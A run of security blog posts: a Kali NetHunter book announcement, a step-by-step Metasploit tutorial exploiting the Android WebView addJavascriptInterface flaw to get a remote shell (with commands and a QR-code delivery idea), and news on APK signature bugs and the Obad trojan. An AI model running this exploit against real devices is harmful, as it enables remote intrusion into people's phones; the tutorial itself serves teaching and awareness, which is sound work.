“Security Testing with Kali NetHunter” Book Overview

nethunter-front-coverMy latest book, “Security Testing with Kali NetHunter” is out! NetHunter brings the power of Kali Linux to supported Android devices.

In this blog post I will cover a quick overview of the book and why I wrote it. This book is the latest in my “Security Testing with Kali” series. If you like my Basic & Intermediate books, I think you will love this one!

I was working on writing a non-Kali based security book, when a good friend approached me and asked if I would create a 50-page quick guide to Kali NetHunter. Being a huge Kali Linux fan, I set my current writing project aside and immediately began on the NetHunter book.

I soon realized that even with trying to make this a quick coverage guide, 50 pages would not even begin to cover the capabilities of this exceptional platform. The ability to use it with wireless and USB based attacks, along with a complement of the normal Kali Linux tools, really makes NetHunter a robust and feature rich device. Add in the fact that it all runs on a small mobile platform and you really have a winner.

To spend the most book time on usage tutorials, with the thought of new devices and platforms at some point being added to the NetHunter supported list, I start the book from the point of a fully installed NetHunter device. Though, I do give an overview of the install process.

This book uses the exact same lab setup as the other books in my Kali series. So, if you already have the lab setup from these books, you just need to connect your NetHunter device to your wireless router.

The book assumes that you already have a level of comfortability with using Kali Linux and have experience connecting to your mobile device using Linux or Windows. From a difficulty level, I would say that this book would fit between my Basic & Intermediate Kali books.

NetHunter includes a couple Android based security tools and a graphical “NetHunter” menu. The book steps you through the Android based attack tools and then goes through each NetHunter menu item as they appear.

Several menu items have an entire chapter devoted to itself.  With the step-by-step tutorials, you can see how the tools work, many times using the tool against our test lab systems.

Along with the NetHunter menu, more experienced users will probably prefer to use many of the Kali tools directly from the terminal prompt. NetHunter uses a slightly reduced install of Kali Linux. You can however install other Kali Metapackages if you wish.

The book topics include:

  • Kali NetHunter Introduction and Overview
  • Shodan App (the “Hacker’s Google”)
  • Using cSploit & DriveDroid
  • Using NetHunter in Human Interface Device Attacks
  • Man-in-the-Middle Attacks
  • Wi-Fi Attacks
  • Metasploit Payload Generator
  • Using NetHunter with a WiFi Pineapple Nano

For the book tutorials, you will need a supported device with NetHunter installed, a host system to run VMWare images, and a supported USB WiFi adapter (I used a TP-Link TL-WN722N).  If you want to follow through the Pineapple Connector chapter you will also need a Hak5 Pineapple Nano.

If you enjoyed my previous books, I think you will really like this one.

Check it out on Amazon.com







Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

Use Exploit

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

Set UriPath Exploit

5. Finally, type “exploit”:


A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at in this demo, you get a remote session:

Session created

Now just connect to the session using “sessions -i 1”:

Interacting with session

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

LS not found

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo path” revealed that no path was set:

Echo Path

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

export path

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux“.

Android Patch Fixes Two File Vulnerability Attacks

Android Vulnerability

Google has released a security update that patches two separate vulnerabilities that could modify apps without changing their digital signature. Thus malicious apps could be installed without triggering a warning.

The first was discovered in February of this year by BlueBox Security. They found that if you took two application install files, one legitimate and one hacked – but using the exact same file name, you could get Android to install the hacked one.

When the resulting zipped APK file is processed and installed, Android would correctly check the digital signature on the first file to verify it’s legitimacy, but would actually install the second file!

According to BlueBox, 99% of Andoid devices are vulnerable to this attack. Sophos has a great step by step write up on it here, or if you are at Black Hat USA 2013 later this month be sure to check out Jeff Forristal’s talk, “Android: one root to own them all

The second vulnerability was published last week on a Chinese website called the ‘Android Security Squad Blog‘ (Google Translation). According to the site, the signature verification process can be attacked by modifying file headers.

Apparently malicious code can be added into the file headers, which at the time of the post’s writing was not checked by the Android’s signature verification process.

Both vulnerabilities have since been patched by Google. But the problem is how long will it take device manufacturer’s to implement the changes and push them out to end user devices? Of concern too is older devices that are no longer being updated.

According to The Verge, Google has made changes to the Google Play store updating mechanism to help prevent attacks like this from happening, and Sophos recommends using an Android Anti-virus program to protect against the vulnerability.

Obad is the Baddest Android Trojan on the Block


There is a new Android Trojan in town and this is one bad dude. Backdoor.AndroidOS.Obad or “Obad” as it is known on the street, is the most sophisticated Trojan ever seen, rivaling the capabilities of Windows based malware.

Yesterday a Malware Analysts Expert from Kapersky Labs released an announcement on a new Trojan that seemed like it was written for Windows and not an Android Device.

Earning it the dubious title “The Most Sophisticated Android Trojan“.

Sure it sends SMS messages to high rate numbers like many other Android malware apps, but there are several new features that really set this one apart. According to the report, Obad also has the following capabilities:

  • Downloads and installs other malware programs
  • Propagates malware to other devices via Bluetooth
  • Fully functional remote Command & Control

The ability to download other malware programs has been a Windows Trojan staple feature for a long time. But being able to use Bluetooth as a springboard to infect other devices is pretty concerning.


Obad’s Command & Control features allow cyber criminals to send commands via SMS messaging, use a remote shell, download remote files, pull application & personal data from the phone, and attack other devices by using Bluetooth.

Another unique feature is that Obad can also freeze the display for up to 10 seconds to hide what it is doing from the device owner.

Using obfuscated code and several new vulnerabilities, Obad definitely raises the stakes in the mobile malware department. Thankfully it is not very well wide spread at the moment.

For more information check out the Kapersky Team’s complete analysis.